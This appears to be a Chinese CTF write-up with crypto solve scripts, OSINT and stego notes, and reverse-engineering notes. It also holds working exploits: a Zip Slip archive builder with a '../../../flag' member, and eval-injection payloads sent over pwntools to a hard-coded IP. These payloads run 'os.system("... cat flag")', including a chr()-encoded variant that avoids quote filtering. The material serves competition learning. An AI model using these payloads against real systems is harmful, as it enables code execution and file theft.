版权声明: 知识共享-版权归属-相同方式共享 3.0 授权协议 |
CC BY-SA 3.0 CN systemcall safe on
Crypto ez_math 二次剩余:求解二次同余方程 x² ≡ a (mod p)。p ≡ 3 (mod 4) 时直接取 a^((p+1)/4),否则用 Cipolla 算法。网上抄的脚本(下面已整理格式并补充注释)。
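"""ez_math: square roots modulo a prime (Cipolla's algorithm).

Solves x^2 == a (mod p).  For p == 3 (mod 4) a root is a^((p+1)/4); otherwise
Cipolla's algorithm works in F_p[sqrt(w)] with w = t^2 - a a non-residue.
"""

try:
    from Crypto.Util.number import long_to_bytes
except ImportError:  # pycryptodome not installed: the stdlib equivalent suffices here
    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

p = 10633422823586641149987674611498617713504538254098629772932594430746901821947698235981680825181906211362587494944457098739784046411665369071558829066081189
a = 1998864314689507283073620353498454561179240654344354244305436493079140699439237202376223842334895492652637067218967769472206166222936609139445293873354277


def convertToBase(n: int, b: int) -> list[int]:
    """Return the digits of n in base b, most significant first (n < 2 gives [n])."""
    if n < 2:
        return [n]
    digits: list[int] = []
    rest = n
    while rest != 0:
        digits.insert(0, rest % b)
        rest //= b
    return digits


def cipollaMult(k: tuple[int, int], i: tuple[int, int], w: int, p: int) -> tuple[int, int]:
    """Multiply (a + b*sqrt(w)) by (c + d*sqrt(w)) in F_p[sqrt(w)].

    Hoisted out of cipolla(): it captures nothing, so there is no reason to
    re-create it on every call.
    """
    a_, b_ = k
    c_, d_ = i
    return ((a_ * c_ + b_ * d_ * w) % p, (a_ * d_ + b_ * c_) % p)


def cipolla(n: int, p: int) -> tuple[int, ...]:
    """Return both square roots of n modulo the prime p, or () if none exists.

    p is assumed prime (not checked).  n is reduced mod p first; 0 and 1 are
    their own roots.
    """
    n %= p
    if n == 0 or n == 1:
        return (n, -n % p)
    phi = p - 1
    # Euler's criterion: n^((p-1)/2) != 1 means n is a quadratic non-residue.
    if pow(n, phi // 2, p) != 1:
        return ()
    if p % 4 == 3:
        root = pow(n, (p + 1) // 4, p)
        return (root, -root % p)
    # Find t with t^2 - n a non-residue (its Euler symbol equals p - 1);
    # about half of all t work, so this loop ends after a couple of trials.
    aa = 0
    for t in range(1, p):
        if pow((t * t - n) % p, phi // 2, p) == phi:
            aa = t
            break
    w = aa * aa - n
    # Montgomery-style ladder computing (aa + sqrt(w))^((p+1)/2); its
    # sqrt(w) coefficient vanishes and its constant term is a root of n.
    exponent = convertToBase((p + 1) // 2, 2)
    x1 = (aa, 1)
    x2 = cipollaMult(x1, x1, w, p)
    for bit in exponent[1:]:
        if bit == 0:
            x2 = cipollaMult(x2, x1, w, p)
            x1 = cipollaMult(x1, x1, w, p)
        else:
            x1 = cipollaMult(x1, x2, w, p)
            x2 = cipollaMult(x2, x2, w, p)
    return (x1[0], -x1[0] % p)


def main() -> None:
    """Print the roots of a mod p, then decode the two values the author recorded."""
    print("Roots of a mod p: " + str(cipolla(a, p)))
    print(long_to_bytes(2983806571612194526961405572692022986638740339194067471831909775297069729649384214862874516129034255347837))
    print(long_to_bytes(10633422823586641149987674611498617713504538254095645966360982236219940416375006212995042084842712143890755585169160029010134662196802494555429794810733352))


if __name__ == "__main__":
    main()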
ez_RSA 遍历平方根上/下所有质数即可。
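"""ez_RSA: textbook RSA decryption once n has been factored.

p and q are close to each other, so they were found by scanning the primes
just below and above sqrt(n) (see the write-up).  The original listing also
imported gmpy2 and sympy.nextprime without using them; those are dropped.
"""

try:
    from Crypto.Util.number import inverse, long_to_bytes
except ImportError:  # pycryptodome not installed: stdlib equivalents (Python 3.8+)
    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

    def inverse(u: int, v: int) -> int:
        """Modular inverse of u mod v; raises ValueError when none exists."""
        return pow(u, -1, v)

n = 4035549166201063668625831121705576874008436911538281208575794760645544423624387564688426536718178366478435676670979144680200696978227814830144542100395711
c = 3786139261372475668724096193769377329093814957990266807059048553543359924439586359037603467723438602328535634566311132223900311678610183892863679621498865
p = 63525972375092879554296019503424174440064543808584645254967172087718895967503
q = 63525972375092879554296019503424174440064543808584645254967172087718895782737
e = 65537


def decrypt(n: int, c: int, p: int, q: int, e: int = 65537) -> bytes:
    """Recover the plaintext of c under (n, e) from the factors p and q.

    Raises ValueError if p * q != n (a mis-copied factor would otherwise
    silently produce garbage) or if e is not invertible mod phi(n).
    """
    if p * q != n:
        raise ValueError("p * q != n: wrong factors")
    phi = (p - 1) * (q - 1)
    d = inverse(e, phi)
    return long_to_bytes(pow(c, d, n))


def main() -> None:
    print(decrypt(n, c, p, q, e))


if __name__ == "__main__":
    main()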
ez_stream 单纯的LCG
抄的网上的代码。
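"""ez_stream: recover the parameters of a linear congruential generator.

The generator is s[i+1] = (multiplier * s[i] + increment) mod modulus.  With
consecutive outputs, differences t[i] = s[i+1] - s[i] satisfy
t[i+2]*t[i] - t[i+1]^2 == 0 (mod modulus), so the gcd of those values is
(with high probability) the modulus; multiplier and increment then follow by
modular arithmetic.  The flag is the seed, one step before streams[0].

Fix over the original listing: the final line referenced an undefined name
`modules` (NameError) instead of `modulus`.
"""
from functools import reduce
from math import gcd  # same result as Crypto.Util.number.GCD used originally

try:
    from Crypto.Util.number import inverse, long_to_bytes
except ImportError:  # pycryptodome not installed: stdlib equivalents (Python 3.8+)
    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

    def inverse(u: int, v: int) -> int:
        """Modular inverse of u mod v; raises ValueError when none exists."""
        return pow(u, -1, v)


def crack_unknown_increment(states: list[int], modulus: int, multiplier: int) -> tuple[int, int, int]:
    """Given modulus and multiplier, read the increment off two consecutive states."""
    increment = (states[1] - states[0] * multiplier) % modulus
    return modulus, multiplier, increment


def crack_unknown_multiplier(states: list[int], modulus: int) -> tuple[int, int, int]:
    """Given the modulus, derive the multiplier from three consecutive states.

    Raises ValueError (from inverse) if states[1] - states[0] is not invertible
    mod modulus.
    """
    multiplier = (states[2] - states[1]) * inverse(states[1] - states[0], modulus) % modulus
    return crack_unknown_increment(states, modulus, multiplier)


def crack_unknown_modulus(states: list[int]) -> tuple[int, int, int]:
    """Recover (modulus, multiplier, increment) from a run of consecutive outputs.

    Needs at least four states; the gcd may be a multiple of the true modulus
    when too few states are available.
    """
    diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])]
    zeroes = [t2 * t0 - t1 * t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
    modulus = abs(reduce(gcd, zeroes))
    return crack_unknown_multiplier(states, modulus)


streams = [
    9495827047149859431006132233092319600974497202909253926749062926629593244068453225049157210427035578610572648934127458697875459018625442857002141732217770,
    10115020037566558567950233730614138895861258911796641397386881027127960456781622215464273323776545118396888793579040620180155181472925379479313621734027106,
    7981464236725021226761002919675861665400231148613997426185256093560877035104768633006706451402090228382477159223882030737510433675925204999566093494578649,
    7234746427175795537750797360089344216037062205426141685667019106513326156971404038531885341019184616074232937324413429612387506532206135481520255585379406,
    1357271691014350448396348499212607078815784207280436403590895273573976719039929574669406267302326522264476319971818333746270219399739509954488350206939098,
    7793179134619447746786204535466843534146448146433627831440211439100356628823998206285679114995319552700902657159016155894261217929142592869048023480586212,
    4200327504806355753051034681672501621139445844167069726269562915330857270053067365147343903654640822017169864193359688974572363544448011864141566263095749,
    108628953170107941851019292289726767457637648818478130784905137964469415279928037910613035615390728484479166491155355807849114853079424541224944189539847,
    5705546688186793363975386254231457567617039881042153075212145501441367909435598304220032988441701636156883589472050191697468859533156776122580445917630325,
    7981888661925380274343353230517871440910482184881452246559514192102636787698437211797463663103264392789656523953870523387090188318571331660341390462731390,
    7457245978258721215462104387713889824053460895409859984119211875448230853693133504670379095111834060476305868684456810408551054941569397242555875768832649,
    4713653327629167917403933577518371673458093664892888492572355124165551105119901889718017605151941173424260920921889047705106706830968478068151992223522578,
    2778597751579300390231070107111625883828070769573760110725311512998545986829373825533426150065870859785603212189825907356142828522955158081072354492809680,
    9425692327305131597174516996805078131281224792942807687405090540733107737207289300618346774901368434264552235754283457515007094594155397130150749105141065,
    9556791103080784553100760363166943075547406777892268608148510940860093314305835822848257344853594949658922763296325860053473764167311744969251511348213287,
    3896599182642428007339381753538662783145048962607822890502362802858865113464050570340177651462017198029133580814296850288701444407514341373723669684607404,
    5301032047745045360653610644813773116678094274772865081138467683002390318886475845448249954952652462684815881485467937894005492015515126563397015290271507,
    10868560876138340913503045822008353068681490521878057747798994346359112617020680300987213799662349291611409047377282385725263726186142570966125699633074711,
    7224059293852369017807048556361213684202031860793036930767704651075967932687581020962849350943008127181892942681851425187555531885333162641401020598706109,
    7226506847869420283438523642497968822001335509181374339634589228508210118084622247062696000754665385287906355641339893928516640360280080695911187254582014,
    4490720948265923860968128277045129252750568336235325441630922401592392266045933527280025412489344475057552346462497460984868092646213341802194388892641162,
    12239413304325398135459519900658880538898158568425938945987878203058591924624777413114550809099368944806146909046355605791667787917390610337772668459482241,
    12031682149667615392071800744401356969359813602233530042569742700015933405128350539724007232636961842858808427912797934459072652111927403074732121115504628,
    4221093662830924228203427096071485647982605270125869903377211974849182525446297391581648132634312810831050522760260275007179715712643712807112993795753997,
    2482697446655927304158367339258791596351991275787745319752390116410069174704817051381264029708263048001624482866674356617492861541235444301461140118393072,
    8640022216821216730690651815111823956880449322964650463439245341042028148002067020497662105357100062992076913929538672631319194491404650014998985176729399,
    2359340306264030427013371066451754161105421482248597639896728896779325719717468031430724904579038543182751480657717151072505664496249601885013517511335354,
    9564043228397984061879998221762974239257692421128455446103840572377581806608193811671996975444148075468746455929973308146521294633753660232825656123106269,
    2907481445175213163867320739818049791618436439840769557448890646035507771955530568981806701569558507904871970470593181264954913164043063396749090598187913,
    10918758557560698694046891429167354585108582071006014989054758320395366657576667871567836659358610198829544520915724060818132910952992777240463509701288475,
]


def main() -> None:
    modulus, multiplier, increment = crack_unknown_modulus(streams)
    # Step the LCG backwards once: the seed is the flag.
    flag = (streams[0] - increment) * inverse(multiplier, modulus) % modulus
    print(long_to_bytes(flag))


if __name__ == "__main__":
    main()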
medium_math 中国剩余定理。模数并不两两互素(其中有偶数),所以要用带 gcd 合并的广义 CRT;求出 x mod lcm 之后枚举 x + k·lcm,检查解码后是否全部 printable。
脚本网上抄的,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ps = [659393664465323 , 906528195345220 , 975250387802548 , 969115381470588 , 111169318220929 , 1000427453556060 , 954439163305195 ] ans = [501927404661911 , 766711039999273 , 177155835710273 , 288656999508165 , 71725206442480 , 876880066906893 , 315100179694493 ] import hashlibfrom functools import reducefrom gmpy2 import gcdfrom Crypto.Util.number import *from string import printableNum = 7 m = ps a = ans def egcd (a, b ): if a == 0 : return (b, 0 , 1 ) else : g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def china (num ): m1,a1,lcm=m[0 ],a[0 ],m[0 ] for i in range (1 ,num): m2=m[i] a2=a[i] c=a2-a1 g,k1,k2=egcd(m1,m2) lcm=lcm*m[i]//gcd(lcm,m[i]) if c%g : print ('No Answer!' ) return 0 x0=c//g*k1 t=m2//g x0=(x0%t+t)%t a1+=m1*x0 m1=m2//g*m1 return a1, lcm ans, lcm=china(Num) print (ans, lcm)while ans.bit_length() < 355 : ans += lcm fl = 1 for i in long_to_bytes(ans): if not chr (i) in printable: fl = 0 break if fl == 1 : print (long_to_bytes(ans))
"""medium_RSA — challenge source as handed out (not the exploit).

Standard RSA with 512-bit primes; the hint value A is a product of
num + 1 factors of the form 2*p + r with r a random 10-bit number.
"""
from Crypto.Util.number import bytes_to_long, getPrime
from random import getrandbits
from secret import flag

m = bytes_to_long(flag)
e = 0x10001
Bit = 512
num = 10

p = getPrime(Bit)
q = getPrime(Bit)
n = p * q
c = pow(m, e, n)

# One leading factor, then num more, each with a fresh 10-bit noise term.
A = 2 * p + getrandbits(10)
for _ in range(num):
    A = A * (2 * p + getrandbits(10))

print(n)
print(c)
print(A)
以下是exp
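"""medium_RSA exploit: decrypt once the 512-bit prime p is known.

A is the hint printed by the challenge; how p was extracted from it is not
shown in the write-up, so p is simply a constant here.  The unused gmpy2 /
sympy star-imports and the unused `num` of the original listing are dropped.
"""

try:
    from Crypto.Util.number import inverse, long_to_bytes
except ImportError:  # pycryptodome not installed: stdlib equivalents (Python 3.8+)
    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

    def inverse(u: int, v: int) -> int:
        """Modular inverse of u mod v; raises ValueError when none exists."""
        return pow(u, -1, v)

n = 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
c = 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
# Hint value; not needed by the decryption below.  The listing broke this
# literal across two lines, so it is re-joined explicitly here.
A = int(
    "635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186"
    "631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000"
)
p = 11084976913707120845676997473476120049925696537758139093110720348331501885877388177868038354130254514285517993448105804093297456650430613525974991412673613
e = 65537


def decrypt(n: int, c: int, p: int, q: int, e: int = 65537) -> bytes:
    """Recover the plaintext of c under (n, e) from the factors p and q.

    Raises ValueError if p * q != n (e.g. p does not divide n) or if e is
    not invertible mod phi(n).
    """
    if p * q != n:
        raise ValueError("p * q != n: wrong factors")
    phi = (p - 1) * (q - 1)
    d = inverse(e, phi)
    return long_to_bytes(pow(c, d, n))


def main() -> None:
    q = n // p
    print(decrypt(n, c, p, q, e))


if __name__ == "__main__":
    main()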
medium_stream 密钥(密钥流)复用。两段密文用的是同一个密钥流 K:c1 ⊕ c2 = m1 ⊕ m2,已知其中一段明文就能异或出另一段。
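"""medium_stream: keystream reuse.

flag_k and known are two ciphertexts produced with the same keystream K,
and the plaintext of `known` is known.  Then
    flag_k ^ known ^ known_p == (K ^ flag) ^ (K ^ known_p) ^ known_p == flag.

The original listing imported pwn.xor and computed an unused `lens`; both
are dropped (the XOR is done on ints).
"""

try:
    from Crypto.Util.number import bytes_to_long, long_to_bytes
except ImportError:  # pycryptodome not installed: stdlib equivalents
    def bytes_to_long(b: bytes) -> int:
        return int.from_bytes(b, "big")

    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

flag_k = 0x17cd2b76cea2303805f63a5dd38c0652f542d796d316dfcbc1ca5d0514f6096bb4f41fd2d2f45de0114a2b7d
known = 0x37e64f5efb8f3e7b7ba12f0d8fd84508a6129fc19051c1ddcb821f4242b6507be1e758c686a108f2455a3c7d
known_p = bytes_to_long(b'sh1kaku{Of all weapons,the past cut deepest}')


def recover(c_target: int, c_known: int, p_known: int) -> bytes:
    """Return the plaintext of c_target given c_known and its plaintext p_known.

    Works on integers, so a leading 0x00 byte in the result would be lost;
    here all three values are 44 bytes and the flag starts with a letter.
    """
    return long_to_bytes(c_target ^ c_known ^ p_known)


def main() -> None:
    print(recover(flag_k, known, known_p))


if __name__ == "__main__":
    main()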
ez_copper 考虑类似Factor with high bits known的做法
把多项式F(x) 变成 ,首一化后coppersmith即可。
然后就是基础的RSA
medium_copper 先通过dp泄露的原理推式子,得到 ,可以得知
考虑在模 的意义下解方程,即 ,解出来后为 的可能值,然后就是ez_copper
hard_math 考虑flag的前7位是一定的,枚举模数p,求出p的原根后可以列出以 七个变量的七个方程,解出方程验证后还原flag即可
Misc LSB but base64 先用 StegSolve 查看 LSB,发现均为乱码。根据提示 b64encode 可知要做 base64 编码(注意 base64 是编码而不是加密):先把 16 进制数转回 bytes,再 base64 编码。
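"""LSB but base64: the LSB payload is a hex number; turn it into bytes and base64-encode.

The original listing ended with a bare `b64encode(byte)` expression, which
only shows a result in an interactive session; run as a script it printed
nothing.  The result is now printed explicitly.
"""
from base64 import b64encode

try:
    from Crypto.Util.number import long_to_bytes
except ImportError:  # pycryptodome not installed: the stdlib equivalent suffices here
    def long_to_bytes(n: int) -> bytes:
        """Big-endian bytes of a non-negative int (b'\\x00' for 0), like pycryptodome."""
        return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")

a = 0x7E56A0FA2B3E5B795CD267BEEE8FB972E72D7FEE2777E9B5B1CFA2E7EBF7AF2F9FBA79F2


def to_b64(value: int) -> bytes:
    """Base64 of the big-endian byte representation of value."""
    return b64encode(long_to_bytes(value))


def main() -> None:
    print(to_b64(a).decode("ascii"))


if __name__ == "__main__":
    main()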
得到结果
豪豪的晚餐 图片中有烤匠两个字确定店子是烤匠 exif查看有经纬度,谷歌地图定位后找一个标志后输入到百度地图中点周边,美食,看最近的一家烤匠再去美团核实店名即可。 小宇的通勤 向上的指示牌是地铁2号和8号线,发现是同一种颜色,上网搜地铁线路标识色发现只有深圳地铁2号和8号是同一条,再看下面的地铁是黄色的确定是14号线,看交汇点既是结果:岗厦北。
豪豪扫描器 notepad++直接搜scu得到答案
Chicken 010editor打开最底下发现一串base64解码即使答案
后来 解的时候走了很多弯路,识图都识别不出来,试了很多办法都没用,搜索结果中也没有想要的,最后在浏览一个网址的时候发现和图中白色柱子长得一样的柱子。
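"""[medium]unzip — build an archive whose member name escapes the extraction directory.

The member is stored as ../../../flag, so an extractor that writes member
names verbatim (no normalisation or containment check) drops the file three
levels above its target directory — the classic "Zip Slip" pattern.  The
archive is printed base64-encoded so it can be pasted into the upload.

Fix over the original listing: both the ZipFile and the re-opened archive are
now closed via `with` (the original never closed the read handle).
"""
from base64 import b64encode
from zipfile import ZipFile


def build_escaping_archive(source_file: str = "flag",
                           member_name: str = "../../../flag",
                           archive: str = "Uploads.zip") -> str:
    """Write source_file into archive under member_name; return the archive as base64 text.

    zipfile keeps the leading "../" components of member_name, which is what
    the exploit relies on.  Raises FileNotFoundError if source_file is missing.
    """
    with ZipFile(archive, "w") as zipf:
        zipf.write(source_file, member_name)
    with open(archive, "rb") as fi:
        return b64encode(fi.read()).decode("ascii")


def main() -> None:
    print(build_escaping_archive())


if __name__ == "__main__":
    main()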
上传该文件,然后查看解压后的文件地址,读出 /flag。能这样读到,说明服务端解压时没有对成员名里的 ../ 做规范化或路径校验(Zip Slip)。
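"""[easy]learning_python — the service evidently evaluates what we send as Python.

The payload imports os and runs a shell command that reads `flag` two
directories above the service's working directory.
"""
from pwn import context, remote

HOST = "114.117.187.56"
PORT = 8901
PAYLOAD = '__import__("os").system("cd .. ; cd .. ; cat flag")'


def main() -> None:
    """Connect, skip the banner, send the payload and print the reply."""
    context(log_level="debug")
    sh = remote(HOST, PORT)
    try:
        sh.recv()  # banner / prompt
        sh.sendline(PAYLOAD.encode())
        # The original relied on the debug log to see the output; print it explicitly.
        print(sh.recv().decode(errors="replace"))
    finally:
        sh.close()


if __name__ == "__main__":
    main()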
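"""[medium]learning python2 — same eval sink, but the payload is sent without quote characters.

The command string is rebuilt as eval(chr(..)+chr(..)+...), so the text we
send contains no quotes at all (the write-up does not say what the service
filters; presumably string literals).
"""

HOST = "114.117.187.56"
PORT = 8902
PAYLOAD = '__import__("os").system("cd .. ; cd .. ; cat flag")'


def chr_encode(code: str) -> str:
    """Return `eval(chr(c1)+chr(c2)+...)` reconstructing `code` character by character.

    An empty `code` yields "eval()" (the original's slice-off-the-last-"+"
    trick produced the malformed "eval)" in that case).
    """
    return "eval(" + "+".join(f"chr({ord(ch)})" for ch in code) + ")"


def main() -> None:
    """Connect, send the chr()-encoded payload and print the reply."""
    # pwntools is only needed to talk to the service; importing it here keeps
    # chr_encode() importable (and testable) without pwntools installed.
    from pwn import context, remote

    context(log_level="debug")
    payloads = chr_encode(PAYLOAD)
    print(payloads)
    sh = remote(HOST, PORT)
    try:
        sh.recv()  # banner / prompt
        sh.sendline(payloads.encode())
        print(sh.recv().decode(errors="replace"))
    finally:
        sh.close()


if __name__ == "__main__":
    main()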
learning python3 没有好好验题是这样的。
预期解可能是用 __subclasses__
之类的花活。
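"""learning python3 — same eval sink; open("/flag") is simply not blocked.

The write-up notes the intended route was probably a __subclasses__-style
sandbox escape, but a direct file read works.
"""
from pwn import context, remote

HOST = "114.117.187.56"
PORT = 8903
PAYLOAD = 'print(open("/flag", "r").read())'


def main() -> None:
    """Connect, skip the banner, send the payload and print the reply."""
    context(log_level="debug")
    sh = remote(HOST, PORT)
    try:
        sh.recv()  # banner / prompt
        sh.sendline(PAYLOAD.encode())
        print(sh.recv().decode(errors="replace"))
    finally:
        sh.close()


if __name__ == "__main__":
    main()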
Reverse ez_pyc 反编译。一眼z3-solver
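"""ez_pyc: the decompiled check is 25 linear equations over the 25 flag bytes.

COEFFS[i] are the coefficients of equation i and TARGETS[i] its right-hand
side (transcribed from the original s.add(...) calls); solve() hands the
system to z3.

Fixes over the original listing:
  * the unknowns were 8-bit BitVecs while the targets are far above 255, so
    z3 truncated the targets and enforced each equation only modulo 256;
    Ints bounded to one byte express the real constraint;
  * the result loop ran to 26 for 25 variables and indexed the model with an
    int, which returns a declaration rather than a value.
"""

COEFFS = [
    [99, 91, 69, 42, 65, 86, 63, 9, 60, 82, 61, 65, 14, 86, 2, 53, 56, 17, 88, 20, 6, 21, 100, 24, 11],
    [99, 2, 14, 30, 38, 23, 6, 100, 43, 58, 82, 20, 19, 39, 16, 1, 15, 82, 97, 47, 28, 51, 96, 54, 43],
    [63, 86, 33, 39, 45, 76, 37, 64, 65, 56, 32, 69, 38, 1, 20, 44, 16, 78, 12, 97, 29, 46, 54, 81, 47],
    [9, 100, 1, 5, 99, 20, 37, 91, 53, 85, 52, 49, 69, 32, 7, 81, 80, 89, 87, 24, 90, 54, 16, 6, 2],
    [72, 18, 71, 28, 67, 25, 26, 59, 96, 30, 65, 39, 29, 35, 95, 55, 67, 63, 72, 61, 30, 74, 38, 61, 58],
    [30, 69, 52, 68, 94, 37, 13, 85, 97, 66, 57, 40, 11, 93, 87, 22, 61, 3, 17, 54, 22, 18, 57, 58, 88],
    [81, 62, 83, 60, 71, 64, 96, 88, 96, 39, 23, 77, 85, 87, 3, 3, 56, 67, 59, 11, 32, 41, 1, 71, 10],
    [95, 66, 37, 55, 2, 29, 65, 85, 68, 95, 77, 16, 2, 94, 54, 92, 44, 48, 70, 25, 57, 48, 74, 63, 49],
    [79, 85, 53, 93, 69, 33, 63, 2, 93, 82, 73, 37, 91, 13, 1, 62, 60, 17, 7, 95, 65, 91, 14, 64, 66],
    [33, 57, 13, 85, 83, 31, 73, 41, 19, 41, 80, 33, 5, 42, 3, 27, 1, 55, 24, 72, 21, 98, 89, 58, 41],
    [29, 5, 52, 22, 21, 8, 41, 10, 51, 69, 90, 63, 90, 24, 91, 99, 40, 6, 17, 81, 47, 100, 99, 3, 46],
    [59, 64, 99, 26, 76, 42, 37, 62, 14, 15, 15, 49, 10, 88, 5, 3, 52, 70, 89, 37, 98, 1, 18, 75, 13],
    [66, 65, 5, 80, 42, 93, 42, 15, 1, 90, 4, 14, 97, 25, 68, 93, 78, 33, 33, 70, 21, 10, 25, 92, 43],
    [25, 95, 15, 82, 82, 99, 9, 60, 74, 8, 82, 99, 79, 83, 8, 42, 41, 75, 93, 75, 36, 57, 84, 99, 67],
    [26, 14, 83, 22, 62, 50, 68, 95, 27, 99, 29, 31, 12, 37, 18, 51, 36, 72, 98, 96, 25, 49, 6, 59, 2],
    [15, 51, 6, 80, 72, 49, 13, 28, 57, 1, 43, 82, 36, 36, 55, 2, 96, 29, 2, 82, 60, 65, 100, 37, 12],
    [32, 44, 6, 70, 17, 49, 66, 51, 29, 13, 38, 26, 27, 18, 73, 1, 67, 45, 10, 49, 63, 9, 75, 46, 88],
    [39, 90, 54, 62, 25, 97, 53, 92, 90, 34, 53, 91, 84, 78, 88, 8, 88, 24, 86, 33, 98, 46, 69, 80, 47],
    [1, 50, 59, 85, 14, 89, 12, 64, 1, 49, 97, 8, 11, 59, 40, 13, 73, 82, 98, 50, 43, 70, 93, 5, 7],
    [83, 41, 15, 86, 1, 18, 7, 93, 72, 49, 48, 26, 83, 70, 18, 28, 32, 77, 81, 5, 61, 8, 98, 94, 22],
    [40, 63, 90, 28, 52, 79, 21, 77, 86, 91, 50, 95, 82, 30, 60, 2, 97, 33, 11, 30, 64, 40, 4, 2, 1],
    [61, 9, 36, 17, 13, 53, 96, 41, 28, 63, 20, 4, 71, 99, 37, 2, 58, 38, 75, 29, 34, 66, 82, 39, 50],
    [51, 56, 13, 6, 80, 8, 99, 76, 14, 32, 99, 7, 27, 32, 20, 23, 79, 89, 54, 78, 23, 89, 96, 85, 94],
    [3, 17, 78, 6, 75, 18, 29, 1, 49, 8, 90, 60, 62, 13, 16, 87, 38, 71, 39, 12, 47, 7, 54, 83, 64],
    [58, 1, 51, 94, 69, 86, 45, 14, 23, 4, 25, 9, 72, 85, 35, 39, 92, 43, 19, 26, 76, 55, 52, 59, 24],
]
TARGETS = [
    133017, 113856, 126193, 128397, 138932, 136211, 141572, 143300, 146502,
    118533, 124392, 118223, 122643, 166882, 120884, 118151, 105637, 168627,
    123563, 125124, 126844, 116479, 139277, 109760, 121674,
]


def satisfies(values: list[int]) -> bool:
    """True if the 25 values meet every equation (pure-Python cross-check of a solution)."""
    if len(values) != len(COEFFS):
        return False
    return all(sum(c * v for c, v in zip(row, values)) == target
               for row, target in zip(COEFFS, TARGETS))


def solve() -> str:
    """Solve the system with z3 and return the flag as text; ValueError if unsat."""
    from z3 import Int, Solver, sat  # local import: the tables above stay usable without z3

    flag = [Int("%d" % i) for i in range(len(COEFFS))]
    s = Solver()
    for v in flag:
        s.add(v >= 0, v <= 255)  # each unknown is one byte of the flag
    for row, target in zip(COEFFS, TARGETS):
        s.add(sum(c * v for c, v in zip(row, flag)) == target)
    if s.check() != sat:
        raise ValueError("no solution")
    model = s.model()
    values = [model[v].as_long() for v in flag]
    return "".join(chr(x) for x in values)


def main() -> None:
    print(solve())


if __name__ == "__main__":
    main()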
Tower of Hanoi Upx脱壳一下,ida反编译,
异或回去即可
DEBUG Ida反编译后发现代码为对一个字符串30次随机两个位置交换,gdb看一下随机数
Gdb发现进去后会RE,patch掉即可
ez_logic Ida反编译后发现由许多setjmp和longjmp组成,发现算法为相邻两个一组做区间加法,并且区间有序,差分后从前到后匹配即可
RE_签到 ida反编译一下
找到flag
ez_base ida反编译后,仔细阅读发现就是一张 的地图上有一些可以走的点,要求每个点只走一次且按“马”的方式走从 到 ,BFS即可
ez_vm ida反编译后,已知一个操作列表,逐步完成操作
经分析:
Case 0:把栈顶两个数相加
Case 1:把栈顶两个数相减
Case 2:把栈顶两个数相异或
Case 3:把栈顶两个数相比较
Case 4,5,6:为比较后的跳转
Case 7:对栈顶的数在另一个数组中下标转值
Case 8:改写数组
Case 9:向栈里加一个数
Case 10:Wrong
Case 11:Right
Case 12:跳转
令另一个数组为Str[]
发现一些结构如
1 2 3 4 5 6 7 8 9 10 9 A 9 100 8 9 100 7 9 lim 3 5 loop1 ... 9 1 9 100 7 0 9 100 8 C loop2 是一个循环 for(i=A;i<lim;i++) { ... }
发现流程由三个循环和一些赋值组成,且代码由Str[100]作为循环的i
分析一下三个循环中分别为
1 2 3 for(int i=0;i<25;i++) Str[i]=Str[i]^Str[i+1] for(int i=0;i<24;i++) Str[i+1]+=Str[i]-i {for(int i=1;i<25;i++) if(Str[i]!=Str[i+49]) return wrong; return right;}
爆破一下Str[0],倒着做即可
ez_unity 先找到核心代码文件 .\XuhanYilun_Data\Managed\Assembly-CSharp.dll
用ILSpy反编译,在项目中找到GameManager.cs
打开GameManager.cs ,在 Update函数中发现这样一段
把这一段去掉后重新编译成dll替换掉原来的Assembly-CSharp.dll
这样人物就不会死亡了
ez_xxx 一眼SMC
patch掉反调试部分后dump出内存,分析内存数据。
写出exp
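"""ez_xxx: undo the dumped check: each byte was stored as (c + 4) ^ 0x28."""

target = [0x7E, 0x1F, 0x43, 0x5E, 0x1F, 0x50, 0x4B, 0x45, 0x5F, 0x4B, 0x4D, 0x5A, 0x4B, 0x44, 0x5B,
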